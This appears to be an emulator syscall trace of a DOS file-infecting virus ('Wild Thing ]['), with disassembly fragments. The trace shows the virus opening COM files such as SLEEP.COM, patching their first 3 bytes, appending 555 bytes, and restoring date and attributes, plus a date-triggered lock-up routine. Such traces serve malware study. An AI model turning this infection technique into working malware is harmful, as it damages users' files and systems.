2018-12-25T12:44:53.858709166Z 62 PC: 131ba | Close file
2018-12-25T12:44:53.860910039Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:53.862029114Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:53.863826684Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:53.865587775Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:53.867046233Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:53.869582101Z 73 PC: 119df | Release memory
2018-12-25T12:44:53.870967968Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:53.873624319Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:50.643597834Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:50.646206884Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:50.648950501Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:50.651832912Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:50.654312402Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:50.661118931Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:50.67184219Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:50.683358311Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:50.708662554Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:50.716232412Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:50.718918526Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:50.727117799Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:50.728917794Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:50.731756216Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.734097199Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:50.743373745Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:50.745547749Z 62 PC: 12f2e | Close file
2018-12-25T12:44:50.755154886Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:50.767107063Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.770221336Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.777143841Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.788568632Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:50.794429675Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:50.795878779Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:50.804079159Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.80552878Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:50.808562073Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.810803894Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:50.820853054Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:50.822619693Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:50.831590235Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:50.842416902Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.845410753Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.85279114Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.86549118Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:50.877915895Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:50.880419236Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:50.888392718Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.890176565Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:50.893599824Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.895506949Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:50.904710224Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:50.907352593Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:50.91583196Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:50.926280264Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.92954722Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:50.935514913Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:50.946182703Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:50.953628539Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:50.954992946Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:50.961593766Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.963153359Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:50.965877992Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:50.967384819Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:50.976027818Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:50.977617052Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:50.985604662Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:50.996278114Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:50.999082967Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.005160126Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.015887852Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.023197679Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.024673453Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.031465278Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.033875288Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.037251012Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.039470864Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.04938439Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.050920417Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.058998767Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.070843347Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.073982972Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.080915077Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.092194088Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.099293307Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.100712534Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.107977012Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.109608036Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.112414329Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.114793265Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.124064182Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.125395425Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.134262996Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.144680892Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.147175566Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.15309376Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.163509636Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.170741654Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.172192899Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.179304175Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.180721543Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.183452361Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.185400992Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.195038071Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.197029823Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.206368196Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.217670251Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.220881321Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.227747375Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.238753271Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.251291266Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.253223603Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.26070981Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.262450952Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.271159532Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.282024976Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.284605363Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:51.28987473Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:51.29182072Z 26 PC: 12f82 | Set disk transfer address (See above)
2018-12-25T12:44:51.293206735Z 9 PC: 12ea4 | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:44:53.4289278Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:44:53.43133458Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:44:53.433842734Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:44:53.437772135Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:44:53.450990197Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:44:53.45265502Z 62 PC: 91fc1 | Close file
2018-12-25T12:44:53.455006199Z 75 PC: 91fe0 | Execute program
2018-12-25T12:44:53.470975893Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:44:53.471961932Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:44:53.474696606Z 48 PC: c609 | Get DOS version
2018-12-25T12:44:53.477531749Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:44:53.479281622Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:44:53.480766072Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:44:53.483747937Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:53.487959262Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:44:53.493495392Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:44:53.505239783Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:44:53.506735808Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:44:53.508909456Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:44:53.532517823Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:44:53.536912925Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:44:53.538374887Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:53.539958428Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:44:53.541090317Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.542206461Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.54388343Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:44:53.553145624Z 62 PC: 8f8eb | Close file
2018-12-25T12:44:53.555059667Z 62 PC: 8f8f2 | Close file
2018-12-25T12:44:53.55750994Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.559382923Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.5613745Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.563793126Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.565838011Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.569297224Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.571774345Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.57324291Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.574779161Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.577072077Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.578652882Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.580317168Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.582927203Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.584978124Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.586947436Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.589892077Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.591576312Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.593072417Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.595140409Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.59707682Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.598444555Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.60033558Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.601880071Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.603164692Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.605175977Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.606657852Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.608109099Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.609698867Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.616055837Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:44:53.617128758Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:44:53.620358212Z 62 PC: 8f90e | Close file
2018-12-25T12:44:53.621832022Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:44:53.622980265Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:44:53.624130212Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:44:53.62742454Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:44:53.628697546Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:44:53.634517177Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:44:53.635975281Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:44:53.636962523Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:44:53.638205321Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:44:53.639715034Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:44:53.640603894Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:44:53.641983587Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:44:53.643288628Z 73 PC: 8fa11 | Release memory
2018-12-25T12:44:53.644402353Z 73 PC: 8efea | Release memory
2018-12-25T12:44:53.645573022Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:44:53.646833316Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:44:53.647979225Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:44:53.649120917Z 73 PC: 8f060 | Release memory
2018-12-25T12:44:53.650394914Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:44:53.655950399Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:44:53.659647936Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:44:53.660928248Z 62 PC: 8f0d1 | Close file
2018-12-25T12:44:53.66222722Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:44:53.675575379Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:44:53.676563563Z 48 PC: 12bee | Get DOS version
2018-12-25T12:44:53.677609455Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:44:53.679372552Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:44:53.680580011Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:44:53.681486036Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:44:53.682702371Z 72 PC: 1355d | Allocate memory
2018-12-25T12:44:53.6843747Z 25 PC: 13596 | Get default drive
2018-12-25T12:44:53.685402018Z 71 PC: 135ad | Get current directory
2018-12-25T12:44:53.687358043Z 59 PC: 135ba | Change current directory
2018-12-25T12:44:53.691083561Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:53.695048759Z 59 PC: 135d3 | Change current directory
2018-12-25T12:44:53.69797346Z 25 PC: 12d13 | Get default drive
2018-12-25T12:44:53.6991494Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:44:53.700202321Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:44:53.701794003Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:44:53.70590628Z 80 PC: 1301d | Set current PSP
2018-12-25T12:44:53.707180871Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:44:53.709113601Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.711069108Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:44:53.712619208Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:44:53.71508395Z 72 PC: 130ec | Allocate memory
2018-12-25T12:44:53.717966682Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:44:53.724596486Z 62 PC: 131ba | Close file
2018-12-25T12:44:53.726772319Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:44:53.728418204Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:44:53.729713033Z 72 PC: 11991 | Allocate memory
2018-12-25T12:44:53.731331051Z 73 PC: 119b2 | Release memory
2018-12-25T12:44:53.733012473Z 72 PC: 119bd | Allocate memory
2018-12-25T12:44:53.734476798Z 73 PC: 119df | Release memory
2018-12-25T12:44:53.735614269Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:44:53.737380204Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:51.375700611Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:51.377298379Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:51.380128221Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:51.383894833Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:51.387564811Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:51.394080676Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:51.400254318Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:51.406891145Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:51.424996286Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:51.432381112Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:51.434273945Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:51.441314436Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:51.442665826Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:51.445796717Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.44817902Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:51.457505351Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:51.459201499Z 62 PC: 12f2e | Close file
2018-12-25T12:44:51.465764791Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:51.473686061Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.475674886Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.480674527Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.492442539Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.506126202Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.511075159Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.520385268Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.522037397Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.54095419Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.542758617Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.551744551Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.553881546Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.562373944Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.573298511Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.576366734Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.583786023Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.594316215Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.601512008Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.603113733Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.610018009Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.611243203Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.61441409Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.615972822Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.624682366Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.626427838Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.634852375Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.646022223Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.649389991Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.653208034Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.659644712Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.665081636Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.666666383Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.671143974Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.673408705Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.675818101Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.678085066Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.688054335Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.68985304Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.698479257Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.713461686Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.716285992Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.720020146Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.726446279Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.731204771Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.732451972Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.736767783Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.73855884Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.74067686Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.742093582Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.747902201Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.749511066Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.758090509Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.772852234Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.77581565Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.782389916Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.794235845Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.801695009Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.803111533Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.810544732Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.812228695Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.815064087Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.816800122Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:51.82693198Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:51.828277927Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:51.83699588Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:51.848076655Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:51.850823959Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:51.857043111Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:51.868177691Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:51.875774865Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:51.87774433Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:51.886056193Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.887966701Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:51.890884075Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:51.893246898Z 64 PC: 13066 | Write file or device (See above)
